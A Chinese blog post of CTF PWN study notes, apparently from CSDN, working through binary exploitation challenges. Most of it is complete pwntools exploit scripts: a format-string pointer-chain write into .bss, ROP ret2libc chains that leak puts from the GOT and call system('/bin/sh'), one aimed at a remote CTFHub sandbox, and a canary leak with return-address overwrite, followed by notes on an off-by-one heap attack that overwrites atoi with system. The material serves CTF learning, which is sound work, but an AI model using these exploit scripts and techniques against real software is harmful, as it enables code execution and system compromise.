从0到1:CTFer成长之路-PWN篇

于 2024-07-30 07:20:59 发布
阅读量229 收藏 3
点赞数 3
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wgf42421/article/details/140786276
版权

72217_格式化字符串不在栈上的利用方式

格式化字符串不在栈上的利用方式, 参数在 .bss 段,不在栈上

条件: 需要多次可输入参数

void vuln()
{
  while ( strcmp(chr, "bye") )
  {
    gets(chr);
    printf(chr);
  }
}
  1. 在栈上找到一个利用链 p1->p2->p3, p2,p3都在栈上.另一个指针 p4-> target(目标地址)
  2. 通过p1 修改 p2 低地址指向 p3
  3. 通过p2 修改 p3 值, 使其指向p4
  4. 通过p3 修改 p4 值 即构造出 p1 -> p2 -> p3 -> p4
"""
|0a:0050│  0x7ffe9b362c80 —▸ 0x4005d0 (_start) ◂— xor ebp, ebp
│13:0098│  0x7ffe9b362cc8 —▸ 0x7ffe9b362d38 —▸ 0x7ffe9b362c82 ◂— 0x2d20000000000040 /* '@'
│pwndbg> fmtarg 0x7ffe9b362cc8
│The index of format argument : 25 ("\%24$p")
pwndbg> fmtarg 0x7ffe9b362c80
The index of format argument : 16 ("\%15$p")
pwndbg> fmtarg 0x7ffe9b362d38
The index of format argument : 39 ("\%38$p")
0x7ffe9b362d38 - 0x7ffe9b362c80 = 0xb8
"""
from pwn import *

s = process('demo')
value = 0xDEADBEEF12345678

payload = "%25$p"
# offset 25
# offset 16
# offset 39

# gdb.attach(s, "b *0x4006e5\n\c\n")
# gdb.attach(s, "b *0x04006FE\n\c\n")
s.sendline(payload)
stack = int(s.recv(14), 16)
success(hex(stack))

pie = stack - 0xb8
pie += 2
print('pie ', hex(pie))
payload = "%" + str(pie & 0xffff) + "c%25$hn"
print('payload, ', payload)
s.sendline(payload)

secret1 = 0x601080 # .bss段中固定地址
secret2 = secret1 // 0x10000
payload = "%" + str(secret2 & 0xffff) + "c%39$hn"
s.sendline(payload)

pie -= 2
payload = "%" + str(pie & 0xffff) + "c%25$hn"
s.sendline(payload)

for i in range(4):
    payload = "%" + str(secret1 & 0xffff) + "c%39$hn"
    s.sendline(payload)
    payload = "%" + str(value & 0xffff) + "c%16$hn"
    s.sendline(payload)
    secret1 += 2
    value //= 0x10000

s.sendline('bye')
s.interactive()

72218_其他常见漏洞

from pwn import *

context(log_level='debug', arch='amd64', os='linux')

s = process('./test')

elf = ELF("./test")
pop_rdi = 0x04006d3  #
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = elf.sym['main']

lst = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
       '+',
       '9',  # 任意数
       pop_rdi,
       puts_got,
       puts_plt,
       main,
       17, 18, 19]

for l in lst:
    s.sendline(str(l))

s.recvline()
puts = u64(s.recv(6).ljust(8, b'\x00'))
success(hex(puts))
libc = ELF("./libc-2.23.so")
offset = puts - libc.sym["puts"]
system = libc.sym["system"] + offset
sh = next(libc.search(b"/bin/sh")) + offset

lst = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
       '+',
       '9',  # 任意数
       pop_rdi,
       sh,
       system,
       main,
       17, 18, 19]

for l in lst:
    s.sendline(str(l))

s.interactive()

基础记录

CTFHUB-栈溢出-ret2libc

附件和远程的libc不同。 远程是 libc6_2.23-0ubuntu11.3_amd64 本地是 libc6_2.23-0ubuntu11.2_amd64

# ctfhub ret2libc
from pwn import *

context.arch = 'amd64'
io = remote('challenge-13106b67e4ff008a.sandbox.ctfhub.com', '29200')
e = ELF('ret2libc')

main_addr = e.symbols['main']
puts_plt = e.symbols["puts"]
puts_got = e.got["puts"]
pop_rdi_ret = 0x0400703

junk = 'a' * (144 + 8)

payload = flat(junk, pop_rdi_ret, puts_got, puts_plt, main_addr)
io.sendlineafter(" ctfhub", payload)

puts_addr = io.recvuntil(b'\x7f')[-6:]
puts_addr = unpack(puts_addr.ljust(8, b'\x00'))  # 地址是6bytes, 补到8位unpack
success(hex(puts_addr))

libc = ELF('./libc.so')
libc.address = puts_addr - libc.sym["puts"]
system = libc.sym["system"]
bin_sh = libc.address + 0x18ce57
success(hex(bin_sh))

ret = 0x00004004c9

payload = flat(junk, ret, pop_rdi_ret, bin_sh, system)  # ubuntu64需要栈对齐, 加个ret
io.sendlineafter(" ctfhub", payload)
io.sendline(payload)

io.interactive()

CTFHUB-栈溢出-Leak canary

from pwn import *

context(os='linux', arch='i386', log_level='debug')
sh = remote('challenge-28d068247472f82b.sandbox.ctfhub.com','24123')
offset_fms = 31  # 格式化字符串的偏移量
offset_sta = 100  # 栈溢出覆盖返回地址的偏移量,计算方法和上面一个相同
p = '%' + str(offset_fms) + '$' + 'p'
print(p)
sh.sendafter('someting:', p)
sh.recvuntil('0x')
canary = int(sh.recv(8), 16)
print('canary = ' + hex(canary))
getshell = ELF('pwn').sym['shell']

exp = flat(
    'A' * offset_sta,  # padding
    canary, 'A' * 8,  # canary , 填充数可以ida看栈,也可以gdb断下这里看 esp 位置,需要填充多少
    'A' * 4,  # caller's $ebp
    getshell)  # ret addr

sh.send(exp)
sh.recv()
sh.interactive()

堆学习

OffByOne

offbyone, 申请多块空间,通过1字节溢出覆盖 size大小为0x41。这时索引1的chunk size变为0x41。覆盖前后变化如下。

申请堆时有结构体,每个nodelist 申请2个堆,一个存放content指针,一个存储content。

这里free出现2个chunk。0x20的head和0x40的content。 

fastbin
0x20: 	0x2316060 ◂— 0x0
0x40: 	0x2316040 ◂— 0x0

再次申请时给2个块。

第一块 head 0x20 分配为 0x2316060(因为它大小为0x20,申请也是0x20)。head对应的ptr->content指针在 head + 0x18的位置。

第二块 content 0x40 分配为 0x2316040。这里是可以修改上面head中的指针的。从而造时任意读取。leak出libc。

然后再通过edit功能可编辑 ptr -> content造成任意写。system写入atoi.手动输入/bin/sh 完成getshell。

调用atoi(buf)时即可完成 system("/bin/sh")

wgf42421
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
《从0到1:CTFer成长之路》粗心的小李
tr_trTTT的博客
04-02 2923
前言: 我是CTF小白,创建此文章只为了记录自己学习的进度 题目: 我们先进入环境 这边给了提示,是吧git放到了外网环境,直接扫一下目录吧,查找一下git目录 git目录下是有东西的 所以我们可以利用工具GitHack或者Git_Extract-master把泄露的内容下载下来 下载下来的文件就会在这边 直接打开就可以看到flag n1book{git_looks_s0_easyfun} ...
Elieen:使用JSON配置CTF-Pwn中的Docker容器.zip
06-19
pwn_dockers:pwn类配置 project_path:[nullable] docker相关资源的文件夹,也是最后Dockerfile生成的文件夹 filename:二进制文件名字 docker_username:docker中运行程序的用户名 image_name:镜像文件名称,...
从0到1——CTFer成长之路(一)
youngerll的博客
03-08 4037
这里写自定义目录标题从0到1——CTFer成长之路(一)Docker安装 从0到1——CTFer成长之路(一) 此书将习题放在docker上,想做习题要先布置docker环境。 Docker安装 Windows商业版可以直接安装,懒得做系统,家庭版可以在VM虚拟机中直接安装。 下载ubuntu20系统及VM15; 安装docker。 ubuntu系统安装: 1.选择英语可以避免后期安装软件改文路径名称。 2.接着是漫长的等待; 3.等待完,右键桌面打开终端。 4.docker安装 ①终端apt
从0到1:CTFer成长之路(笔记不断更新)
hxhxhxhxx的博客
01-26 5719
ctfer从0到1web入门信息搜集 web入门 信息搜集 敏感目录 敏感备份文件 Banner识别
从0到1:CTFer成长之路
qq_61950442的博客
07-02 614
拉取仓库暂存git add .提交上传git push查看日志git log拉取远程修改git pull。
《从0到1:CTFer成长之路》2.1 SSRF漏洞
ZhShy
01-15 4942
文章目录2.1.1 SSRF的原理解析2.1.2 SSRF漏洞的寻找和测试2.1.3 SSRF漏洞攻击方式2.1.3.1 内部服务资产探测2.1.3.2 使用Gopher协议扩展攻击面1. 攻击Redis2. 攻击MySQL3. PHP-FPM攻击4. 攻击内网中的脆弱web应用 SSRF(Server Side Request Forgery,服务端请求伪造)是一种攻击者通过构造数据进而伪造服务器端发起请求的漏洞。因为请求是由内部发起的,所以一般情况下,SSRF漏洞攻击的目标往往是从外网无法访问的内部系
pwn-environment:使用docker的ctf-pwn环境
05-11
环境 使用docker的ctf-pwn环境
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
《从0到1:CTFer成长之路
lly的博客
04-03 987
《从0到1:CTFer成长之路》 打开题目 :常见的搜索 啊啊啊啊啊啊啊 冲冲冲 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210403200700769.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dpcmVzaGFya3o=,size_16,color_FFFFFF,t_70#pic_center
从0到1CTFer成长之路-第一章-CTF中的SQL注入
黑白的博客
03-01 1954
CTF中的SQL注入 声明 好好向大佬们学习!!! 攻击 https://book.nu1l.com/tasks/#/pages/web/1.2 SQL注入-1 kali执行 vim docker-compose.yml 内容如下 version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-sql-1:latest ports: - 80:80 开启docker .
命令执行漏洞(教材:从零到一 CTFer成长之路
L2329794714的博客
03-18 5757
一、什么是命令执行漏洞 由于开发者使用一些执行命令函数其未对用户输入的数据进行安全检查时,可注入恶意命令,实现恶意命令执行。 命令执行一般发生在远程,故称远程命令执行RCE(Remote Command Exec或Remote Code Exec)。 以PHP的syste()函数为例: <?php $str = $_GET['name']; system("echo hello ".$str); //调用系统程序执行命令 ?> 正常输入?name=lusong,
从0到1:CTFer成长之路学习笔记——举足轻重的信息搜集
最新发布
liuzibo1024的博客
07-02 301
SVN是源代码版本管理工具,可以利用.svn/entries或wc.db文件获取服务器源码等信息。gedit编辑器保存后会生成后缀为。vim意外退出后会生成。Banner识别工具。
从0到1:CTFer成长之路docker环境搭建
iuyoo的博客
04-17 1517
1. 安装 docker 使用官方安装脚本安装 sudo curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun 也可以使用国内 daocloud 一键安装命令: sudo curl -sSL https://get.daocloud.io/docker | sh 由于之前使用了 snap 安装过 docker,运行 docker 命令出现: bash:/snap/bin/do...
《从0到1:CTFer成长之路》解题
m0_46495271的博客
07-14 439
举足轻重的信息搜集 第一题:常见的搜集 进入环境,用dirsearch扫一下,发现存在vim备份文件,gedit备份文件和robots.txt文件。 robots.txt直接访问,发现flag1_is_her3_fun.txt,直接访问发现了flag1。 index.php~直接访问,发现flag2。 直接访问.index.php.swp,把vim备份文件下载下来,然后vim -r index.php.swp对文件进行恢复,就可以得到flag3。 然后把这三个flag拼接起来就可以了。 第二题 粗心的小李
从0到1CTFer成长之路环境搭建详细教程
啊醒的博客
05-12 2270
从0到1CTFer成长之路环境搭建详细教程 1、安装docker容器 curl -fsSL https://get.docker.com -o get-docker.sh sh get-docker.sh 安装成功后启动,并设置开机自启 systemctl start docker systemctl enable docker.service 2、安装dock Compose sudo curl -L "https://github.com/docker/compose/releases/downl
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值